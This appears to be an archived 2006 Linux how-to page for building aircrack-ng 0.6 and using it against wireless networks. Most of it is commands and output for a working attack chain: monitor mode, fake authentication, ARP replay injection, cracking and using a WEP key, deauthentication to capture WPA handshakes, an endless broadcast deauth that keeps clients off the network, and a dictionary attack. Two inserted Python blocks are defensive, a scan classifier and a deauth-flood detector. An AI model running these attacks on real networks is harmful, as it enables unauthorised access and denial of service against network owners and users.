Updated on 12 Aug 2006, on SUSE 10.1
Aircrack-ng is a set of tools for auditing wireless networks.
This installation builds the madwifi-ng driver with the aircrack-ng patch applied, then builds aircrack-ng 0.6 itself.
```
# wget http://patches.aircrack-ng.org/madwifi-ng-r1679.patch
# wget http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
# tar zxvf madwifi-ng-r1679-20060707.tar.gz
# cd madwifi-ng-r1679-20060707/
# patch -Np1 -i ../madwifi-ng-r1679.patch
# make
# make install
# modprobe ath_pci
# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
# tar zxvf aircrack-ng-0.6.tar.gz
# cd aircrack-ng-0.6/
# make
# make install
# modprobe ath_pci
```
```
# iwlist ath0 scan
ath0      Scan completed :
          Cell 01 - Address: 00:03:2F:23:96:68
                    ESSID:"hoge1"
                    Mode:Master
                    Frequency:2.412 GHz (Channel 1)
                    Quality=56/94  Signal level=-39 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:bcn_int=100
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (1) : TKIP
                        Authentication Suites (1) : PSK
                    Extra:ath_ie=dd0900037f0101000eff7f
          Cell 02 - Address: 00:03:2F:23:92:64
                    ESSID:"hoge2"
                    Mode:Master
                    Frequency:2.437 GHz (Channel 6)
                    Quality=12/94  Signal level=-83 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:bcn_int=100
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (1) : TKIP
                        Authentication Suites (1) : PSK
                    Extra:ath_ie=dd0900037f01010017ff7f
```
```
# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
# airodump-ng ath1

 CH 13 ][ Elapsed: 28 s ][ 2006-08-12 15:32

 BSSID              PWR  Beacons  # Data  CH  MB   ENC   ESSID
 00:03:2F:23:96:68  150       65      72   1  54.  WPA   hoge1
 00:03:2F:23:92:64  101        4       0   6  54.  WEP?  hoge2

 BSSID              STATION            PWR  Packets  Probes
 00:03:2F:23:96:68  00:0F:A3:1C:C4:31  140        7
 00:03:2F:23:96:68  00:0F:A3:1C:C4:3E  134        5
 00:03:2F:23:96:68  00:0F:A3:1C:C4:48  132       10  hoge1
 00:03:2F:23:96:68  00:0F:A3:11:02:C7  120       11  hoge1
```
This output lists the access points in range and, in the second table, the clients associated with each AP.
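As an added example that is not part of the original page: a small Python audit helper that parses iwlist scan output like the one above and classifies each cell by the weakest protection it advertises (open, WEP, WPA-TKIP, WPA2-CCMP), which is the defender's view of the same scan. The sample scan text is constructed from the cells above, with an extra open network added.

```python
import re

# Constructed sample shaped like the page's "iwlist ath0 scan" output; Cell 03 is an added open network.
SAMPLE_SCAN = """\
          Cell 01 - Address: 00:03:2F:23:96:68
                    ESSID:"hoge1"
                    Encryption key:on
                    IE: WPA Version 1
                        Pairwise Ciphers (1) : TKIP
          Cell 02 - Address: 00:03:2F:23:92:64
                    ESSID:"hoge2"
                    Encryption key:on
          Cell 03 - Address: 00:11:22:33:44:55
                    ESSID:"guest"
                    Encryption key:off
"""

def parse_cells(text):
    """Split iwlist output into one dict per cell."""
    cells, cur = [], None
    for line in text.splitlines():
        m = re.match(r'\s*Cell \d+ - Address: ([0-9A-F:]{17})', line)
        if m:
            cur = {"bssid": m.group(1), "essid": "", "key": "off",
                   "ies": [], "ciphers": []}
            cells.append(cur)
        elif cur is not None:
            s = line.strip()
            if s.startswith("ESSID:"):
                cur["essid"] = s[6:].strip('"')
            elif s.startswith("Encryption key:"):
                cur["key"] = s.split(":", 1)[1]
            elif s.startswith("IE: "):
                cur["ies"].append(s[4:])      # e.g. "WPA Version 1"
            elif "Cipher" in s:
                cur["ciphers"].append(s.split(":")[-1].strip())
    return cells

def classify(cell):
    """Weakest protection the cell advertises; iwlist shows only what the beacon carries."""
    if cell["key"] == "off":
        return "OPEN"
    if not cell["ies"]:
        return "WEP"      # key on but no WPA/RSN IE: pre-RSN encryption
    if any(ie.startswith("WPA Version 1") for ie in cell["ies"]) or "TKIP" in cell["ciphers"]:
        return "WPA-TKIP"
    return "WPA2-CCMP"

def audit(text):
    return {c["bssid"]: classify(c) for c in parse_cells(text)}   # BSSID -> class
```

Run `audit` over a fresh scan periodically and diff the result against the list of approved access points; any OPEN or WEP entry, or an unknown BSSID, is what a site survey is meant to surface.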
The WEP and WPA walkthroughs below were done with a different card, a PrismGT (prism54 driver) interface named eth0:
```
# airmon-ng
usage: /usr/local/sbin/airmon-ng <start|stop> <interface> [channel]

Interface       Chipset         Driver
eth0            PrismGT         prism54

# airmon-ng start eth0
usage: /usr/local/sbin/airmon-ng <start|stop> <interface> [channel]

Interface       Chipset         Driver
eth0            PrismGT         prism54 (monitor mode enabled)
```
```
# airodump-ng eth0 out 0

 BSSID              PWR  Beacons  # Data  CH  MB  ENC   ESSID
 00:0D:0B:98:96:7F   48        2       0  11  54  WEP?  4B18E8C83ABD
 00:A0:B0:40:5C:84   87       13      16   1  54  WEP   HOGE

 BSSID              STATION            PWR  Packets  ESSID
 00:A0:B0:40:5C:84  00:04:23:52:80:41   86        4  HOGE
```
```
# airodump-ng eth0 out 1 1

 BSSID              PWR  Beacons  # Data  CH  MB  ENC  ESSID
 00:A0:B0:40:5C:84   87       36      48   1  54  WEP  HOGE

 BSSID              STATION            PWR  Packets  ESSID
 00:A0:B0:40:5C:84  00:04:23:52:80:41   87       38  HOGE
```
```
# aireplay-ng -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 eth0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)
```
If it cannot associate, use an associated station's MAC address:
```
# aireplay-ng -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
```
Some access points require clients to reassociate every 20 seconds; otherwise the fake client is considered disconnected. In that case, set the periodic re-association delay:
```
# aireplay-ng -1 20 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
```
ARP request replay (attack 3):
```
# aireplay-ng -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 -x 600 eth0
Saving ARP requests in replay_arp-1112-031550.cap
You must also start airodump to capture replies.
Read 39123 packets (got 1024 ARP requests), sent 24543 packets...
```
Once airodump-ng has written enough IVs to out.ivs, run aircrack-ng on them:
```
# aircrack-ng -x -0 out.ivs
```
```
# iwconfig eth0 mode Managed key XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX
# dhcpcd eth0
# ifconfig eth0
eth0      Link encap:UNSPEC  HWaddr 00-0A-79-18-35-7A-0A-00-00-00-00-00-00-00-00-00
          inet addr:192.168.0.12  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::20a:79ff:fe18:357a/64 Scope:Link
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          RX packets:330521 errors:0 dropped:0 overruns:0 frame:0
          TX packets:157988 errors:3 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:24164635 (23.0 Mb)  TX bytes:9864176 (9.4 Mb)
          Interrupt:11
# ping google.com
PING google.com (72.14.207.99) 56(84) bytes of data.
64 bytes from 72.14.207.99: icmp_seq=1 ttl=234 time=203 ms
64 bytes from 72.14.207.99: icmp_seq=2 ttl=234 time=201 ms
```
For the WPA capture, run airodump-ng on channel 1 without the IVs flag, so that full packets (and with them the handshake) are written to out.cap:
```
# airodump-ng eth0 out 1

 BSSID              PWR  Beacons  # Data  CH  MB  ENC  ESSID
 00:A0:B0:40:5C:84   87       36      48   1  54  WEP  HOGE

 BSSID              STATION            PWR  Packets  ESSID
 00:A0:B0:40:5C:84  00:04:23:52:80:41   87       38  HOGE
```
Attack 0 (deauthentication) captures WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests, as Windows clients sometimes flush their ARP cache when disconnected. This attack is useless if there are no associated wireless clients.
```
# aireplay-ng -0 5 -a 00:A0:B0:40:5C:84 -c 00:04:23:52:80:41 eth0
00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
00:43:41  Sending DeAuth to station   -- STMAC: [00:04:23:52:80:41]
```
```
# aireplay-ng -0 10 -a 00:A0:B0:40:5C:84 eth0
# aireplay-ng -3 -b 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
```
After sending the five deauthentication packets, it starts listening for ARP requests with attack 3. The -h option is required and must be the MAC address of an associated client.
```
# aireplay-ng -0 0 -a 00:A0:B0:40:5C:84 eth0
```
With count 0, this attack loops forever, sending deauthentication packets to the broadcast address and thus preventing clients from staying connected.
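As an added example that is not part of the original page: the detection side of the deauthentication traffic shown above. A wireless IDS sensor that logs management frames can flag a sender emitting more deauth frames per second than any real access point would, and can single out broadcast deauths. The frame records are constructed to mirror the aireplay-ng output above; the sensor format and the `(time, subtype, src, dst)` tuple shape are assumptions.

```python
from collections import defaultdict, deque

# Constructed sample of 802.11 management frames as a WIDS sensor might log
# them: (time_s, subtype, source, destination). The first burst mirrors the
# "aireplay-ng -0 5" output above; the broadcast frame is the count-0 form.
AP, STA, BCAST = "00:A0:B0:40:5C:84", "00:04:23:52:80:41", "ff:ff:ff:ff:ff:ff"
SAMPLE_FRAMES = [
    (0.00, "deauth", AP, STA), (0.01, "deauth", AP, STA),
    (0.02, "deauth", AP, STA), (0.03, "deauth", AP, STA),
    (0.04, "deauth", AP, STA),
    (1.50, "deauth", AP, BCAST),
    (5.00, "deauth", AP, STA),
    (9.00, "assoc_resp", AP, STA), (9.10, "beacon", AP, BCAST),
]

def detect_deauth_floods(frames, window_s=1.0, threshold=3):
    """Alert (time, sender, last_dst, count) when a sender emits more than
    `threshold` deauth frames inside `window_s`. A real AP rarely
    deauthenticates a client several times per second; a sender spoofing
    the AP's address still shows up here because the frames carry it as
    source. The window resets after each alert, so one burst gives one alert."""
    recent = defaultdict(deque)     # sender -> timestamps of recent deauths
    alerts = []
    for t, subtype, src, dst in frames:
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append(t)
        while q and t - q[0] > window_s:   # drop timestamps outside the window
            q.popleft()
        if len(q) > threshold:
            alerts.append((t, src, dst, len(q)))
            q.clear()
    return alerts

def broadcast_deauths(frames):
    """Deauth frames addressed to ff:ff:ff:ff:ff:ff; legitimate APs send these
    so rarely that even a low count deserves a look."""
    return [f for f in frames if f[1] == "deauth" and f[3] == BCAST]
```

Tune `window_s` and `threshold` against a baseline of the site's own APs before alerting on production traffic.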
Build a wordlist from all.gz (dropping comment lines) and run the dictionary attack against the captured handshake:
```
# zcat all.gz | egrep -v '^#' > dic
# aircrack-ng -w dic -0 out.cap
Opening out.cap
Read 154839 packets.

   #  BSSID              ESSID  Encryption

   1  00:A0:B0:40:5C:84  HOGE   WPA (1 handshake)
   2  00:02:2D:C2:38:AF         Unknown

Index number of target network ? 1
```
Note: In my experience, Aircrack is the best tool compared to the others. Aircrack on Linux supports packet injection, which means we can increase the traffic, so we need only a few hours to capture sufficient packets. Otherwise you will need several days.
Here are my other reports.
| Tool | OS | CPU usage | Encryption | 802.11 standard | NIC support | Packet injection | My recommendation |
|---|---|---|---|---|---|---|---|
| Airsnort (note) | Windows | High | WEP | 802.11b | Few | Not supported | Low |
| Airsnort (note) | Linux | High | WEP | 802.11b | Few | Not supported | Low |
| Aircrack (note) | Windows | Low | WEP, WPA | 802.11a/b/g | Many | Not supported | Mid |
| Aircrack | Linux | Low | WEP, WPA | 802.11a/b/g | Many | Supported! | Recommended! |
Source: http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html